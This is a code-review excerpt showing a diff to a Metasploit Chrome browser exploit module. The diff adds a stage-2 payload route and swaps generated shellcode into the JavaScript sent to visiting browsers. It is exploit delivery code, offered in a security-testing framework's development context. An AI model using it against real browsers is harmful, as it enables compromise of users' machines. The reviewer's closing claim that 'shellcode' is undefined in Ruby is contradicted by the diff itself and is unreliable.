modules/exploits/multi/browser/chrome_object_create.rb

```diff
@@ -50,9 +60,27 @@ def on_request_uri(cli, request)
     end
 
     print_status("Sending #{request.uri} to #{request['User-Agent']}")
+    uripath = datastore['URIPATH'] || get_resource
+    uripath += '/' unless uripath.end_with? '/'
+
+    if request.uri.to_s.end_with?('/payload')
+      loader_data = stage_payload()
+      pidx = loader_data.index('PAYLOAD:')
+      if pidx
+        loader_data[pidx, payload.encoded.length] = payload.encoded
+      end
+      loader_data = loader_data + "\0" * (0x20000 - loader_data.length)
+      send_response(cli, loader_data, {'Content-Type' => 'application/octet-stream', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
+      print_good("Sent stage2 exploit (#{loader_data.length.to_s(16)} bytes)")
+    end
+
+    loader = generate_loader
+    shellcode = loader[0]
+    shellcode_addr_offset = loader[1]
+    shellcode_size_offset = loader[2]
 
     jscript = %Q^
-let shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);
+let shellcode = new Uint8Array([#{Rex::Text::to_num(shellcode)}]);
```

Comment:
Does this work? A quick look at the source shows `shellcode` won't be defined as a Ruby variable here. `shellcode` is a JavaScript variable and won't be accessible within the Ruby string interpolation.